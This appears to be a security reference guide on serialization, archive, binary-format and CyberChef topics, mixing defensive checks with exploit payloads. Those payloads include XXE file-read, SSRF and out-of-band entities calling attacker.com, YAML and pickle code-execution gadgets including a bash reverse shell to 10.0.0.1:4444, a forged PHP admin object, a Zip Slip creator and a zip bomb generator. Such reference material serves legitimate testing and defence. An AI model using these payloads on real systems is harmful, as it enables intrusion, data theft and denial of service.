// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');

# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    # Collapse each run of chr(N).chr(M)... into one quoted string literal,
    # leaving every other '.' in the source untouched
    chain = re.compile(r'chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*')
    def replace(m):
        codes = re.findall(r'chr\(\s*(\d+)\s*\)', m.group(0))
        # PHP's chr() wraps its argument modulo 256
        return repr(''.join(chr(int(c) % 256) for c in codes))
    return chain.sub(replace, php_code)

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key
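
One way to close the first-key/last-key gap on the Python side is to refuse documents with duplicate keys altogether. The sketch below uses the `object_pairs_hook` parameter of `json.loads`; `reject_duplicates` and `strict_loads` are hypothetical helper names.

```python
import json

def reject_duplicates(pairs: list[tuple[str, object]]) -> dict:
    """object_pairs_hook that raises instead of silently keeping the last key."""
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate JSON key: {key!r}")
        seen[key] = value
    return seen

def strict_loads(text: str):
    return json.loads(text, object_pairs_hook=reject_duplicates)

print(strict_loads('{"a": 1, "b": {"c": 2}}'))
try:
    strict_loads('{"role": "user", "role": "admin"}')
except ValueError as exc:
    print("rejected:", exc)
```

The hook runs for every object, including nested ones, so a duplicate buried deep in the document is caught as well.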

XML (XXE, SSRF, billion laughs)

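# --- DANGEROUS: many XML parsers resolve external entities by default (XXE) ---
# Python's xml.etree.ElementTree does not fetch external entities, but it can still be hit by
# entity-expansion DoS on older Expat builds; treat any parser as unsafe for untrusted input
# until its entity and DTD handling is confirmed to be disabled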

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expand to 10^8 copies (~300 MB); the classic variant adds one more level for 10^9 copies (~3 GB)

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred
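
Where defusedxml cannot be installed, one stdlib-only option is to refuse any document that declares a DOCTYPE, which removes the entity definitions that XXE and billion laughs depend on. The following is a sketch under that assumption, not an equivalent of defusedxml; `parse_xml_no_dtd` is a hypothetical helper name, and legitimate documents that need a DTD will be rejected too.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

def parse_xml_no_dtd(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE declaration."""
    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE {name!r} rejected")

    # First pass: a bare expat parser whose only job is to spot a DOCTYPE.
    # The handler fires when the declaration starts, before the document
    # body (and any entity reference in it) is processed.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = forbid_doctype
    scanner.Parse(xml_bytes, True)

    # Second pass: normal parsing of a document known to be DTD-free.
    return ET.fromstring(xml_bytes)

root = parse_xml_no_dtd(b"<root><item>1</item></root>")
print(root.find("item").text)
```

Parsing twice costs some time on large inputs; the benefit is that the check relies only on documented `xml.parsers.expat` handlers.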

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with an unsafe Loader (yaml.Loader / yaml.UnsafeLoader) executes arbitrary Python;
# PyYAML before 5.1 behaved this way by default
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False
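
A substring search flags any pickle that happens to contain the bytes "os". A more precise heuristic is to walk the opcode stream with the standard-library `pickletools` module and list what the pickle would import, still without unpickling it. The sketch below assumes that approach; `pickle_imports` is a hypothetical helper name, and the STACK_GLOBAL handling (taking the two most recent string constants) is an approximation that a deliberately crafted pickle could confuse.

```python
import pickle
import pickletools

def pickle_imports(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) pairs a pickle would import, without loading it."""
    found = []
    strings = []   # string constants seen so far (operands of STACK_GLOBAL)
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-2: argument is "module name" in one string
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name were pushed as strings beforehand
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

print(pickle_imports(pickle.dumps([1, 2, 3])))   # plain data imports nothing
```

On Linux, `os.system` appears in the output as module `posix` (and `nt` on Windows), which is why those names sit in the module list above.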

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)
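
Signing proves where a pickle came from but does nothing if the signing key leaks. A complementary control, described in the Python `pickle` documentation, is to override `Unpickler.find_class` so only allowlisted globals can be resolved. The sketch below follows that pattern; the `ALLOWED` set and the `restricted_loads` name are illustrative assumptions.

```python
import io
import pickle

# Hypothetical allowlist: extend with the exact classes the application needs.
ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("builtins", "range")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle tries to import
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses any global outside ALLOWED."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps({"user": "admin", "ids": [1, 2, 3]})))
```

Plain containers, strings, and numbers never reach `find_class`, so ordinary data still loads while a `__reduce__` payload fails before its callable is resolved.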

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    # PHP counts bytes, not characters, so measure the UTF-8 encoding
    return f's:{len(s.encode("utf-8"))}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
    return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison
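
Checking whether a digest is a "magic hash" is a one-line pattern match: the hex string must be zeros, then `e`, then decimal digits only. A minimal sketch; `MAGIC_HASH` and `is_magic_hash` are hypothetical names.

```python
import hashlib
import re

# "0e" followed only by digits parses as the float 0 under PHP loose comparison
MAGIC_HASH = re.compile(r'0+e\d+')

def is_magic_hash(hex_digest: str) -> bool:
    return MAGIC_HASH.fullmatch(hex_digest) is not None

digest = hashlib.md5(b"240610708").hexdigest()
print(digest, is_magic_hash(digest))
```

The same predicate can drive a search loop over candidate inputs when a magic value is needed for a different hash function.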

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }

# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
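            # Compare whole path components so names like 'notes..txt' are not flagged
            if name.startswith('/') or '..' in name.replace('\\', '/').split('/'):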
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False
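
The sizes checked above come from the archive's own headers, which an attacker controls. A more defensive pattern is to cap how many bytes are actually read while decompressing. The sketch below assumes a per-member byte limit; `read_member_capped` is a hypothetical helper name.

```python
import zipfile

def read_member_capped(zf: zipfile.ZipFile, name: str, limit: int) -> bytes:
    """Decompress one member, refusing to produce more than `limit` bytes."""
    with zf.open(name) as member:
        # Ask for one byte more than allowed: getting it means the cap was hit
        data = member.read(limit + 1)
    if len(data) > limit:
        raise ValueError(f"{name}: decompressed size exceeds {limit} bytes")
    return data
```

A usage sketch: open the archive with `zipfile.ZipFile(path)` and call `read_member_capped(zf, info.filename, 50_000_000)` for each entry, treating `ValueError` as a likely bomb. Memory use stays bounded by the limit regardless of what the headers claim.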

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)

tar analysis and attacks

# List tar contents (check for path traversal); -t without -v prints bare paths,
# so the anchors match the start of each name
tar -tf archive.tar | grep -E '(^|/)\.\.(/|$)|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink attacks
tar -tvf archive.tar | grep '^l'

import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            # Compare whole path components so names like 'notes..txt' are not flagged
            if member.name.startswith('/') or '..' in member.name.split('/'):
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction (Python 3.12+ has filter parameter)
# tarfile.open(path).extractall(dest, filter='data')  # Python 3.12+
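
The one-liner above can be wrapped so that it fails closed on interpreters without extraction filters. Filters were introduced by PEP 706 and, besides 3.12, were backported to some earlier security releases, so the sketch checks for the feature rather than the version. `extract_tar_safely` is a hypothetical helper name.

```python
import tarfile

def extract_tar_safely(tar_path: str, dest: str) -> None:
    """Extract with the 'data' filter, or refuse if filters are unavailable."""
    if not hasattr(tarfile, "data_filter"):
        raise RuntimeError("this Python lacks tarfile extraction filters")
    with tarfile.open(tar_path) as tf:
        # 'data' rejects absolute paths, '..' escapes, links pointing outside
        # the destination, and device files; it also strips setuid/setgid bits
        tf.extractall(dest, filter="data")
```

With the default `errorlevel`, a rejected member raises a `tarfile.FilterError` subclass (itself a `tarfile.TarError`), so callers can catch `tarfile.TarError` to treat the archive as hostile.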

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")

# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

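    import datetime
    try:
        # Timezone-aware conversion; utcfromtimestamp() is deprecated since Python 3.12
        compile_time = datetime.datetime.fromtimestamp(
            timestamp, tz=datetime.timezone.utc).isoformat()
    except (OSError, OverflowError, ValueError):
        compile_time = f"raw: {timestamp}"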

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
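        'is_dll': bool(characteristics & 0x2000),   # IMAGE_FILE_DLL
        # IMAGE_FILE_EXECUTABLE_IMAGE (0x0002) is also set on DLLs, so exclude them here
        'is_exe': bool(characteristics & 0x0002) and not (characteristics & 0x2000),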
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))
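
The COFF header also gives the section count and the optional header size, which together locate the section table. The following is a minimal sketch of walking that table; the function name `parse_pe_sections` and the returned dictionary keys are hypothetical, and no bounds hardening against malformed files is attempted.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_pe_sections(data: bytes) -> list[dict]:
    """List the section headers of a PE image (sketch)."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]
    if data[pe_offset:pe_offset + 4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    coff_offset = pe_offset + 4
    num_sections = struct.unpack_from('<H', data, coff_offset + 2)[0]
    opt_header_size = struct.unpack_from('<H', data, coff_offset + 16)[0]
    table = coff_offset + 20 + opt_header_size  # section table follows the optional header

    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER is 40 bytes: Name(8) VirtualSize(4) VirtualAddress(4)
        # SizeOfRawData(4) PointerToRawData(4) ... Characteristics(4) at offset 36
        off = table + i * 40
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from('<8sIIII', data, off)
        flags = struct.unpack_from('<I', data, off + 36)[0]
        sections.append({
            'name': name.rstrip(b'\x00').decode('ascii', 'replace'),
            'virtual_address': vaddr,
            'virtual_size': vsize,
            'raw_offset': raw_ptr,
            'raw_size': raw_size,
            'executable': bool(flags & IMAGE_SCN_MEM_EXECUTE),
            'writable': bool(flags & IMAGE_SCN_MEM_WRITE),
        })
    return sections
```

A section that is both writable and executable, or one whose raw size is far smaller than its virtual size, is a common (though not conclusive) hint of packing.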

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Candidate set for bad-character testing: send every byte value, then see which get mangled
ALL_BAD_CHARS = bytes(range(256))

# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

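CyberChef is a browser-based data manipulation tool, billed as "The Cyber Swiss Army Knife." Operations run client-side, so input is not sent to a server unless the recipe itself uses a network operation such as HTTP request or DNS over HTTPS. Source: github.com/gchq/CyberChef (34k+ stars at the time of writing).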

Key features

Feature	Description
Drag-and-drop recipes	Chain operations visually
Auto Bake	Real-time output as input/recipe changes
Magic	Auto-detect encoding and suggest decode steps
Breakpoints	Step through recipe stages to inspect intermediate data
File support	Handle files up to ~2 GB
URL sharing	Share complete recipes via URL parameters
Client-side	No data sent to any server

Most-used operations for security work

Category	Operations
Encoding	To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML	URL Encode/Decode, HTML Entity Encode/Decode
Crypto	AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing	MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression	Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format	Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking	Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis	Entropy, Frequency distribution, Detect file type, Strings, Hexdump
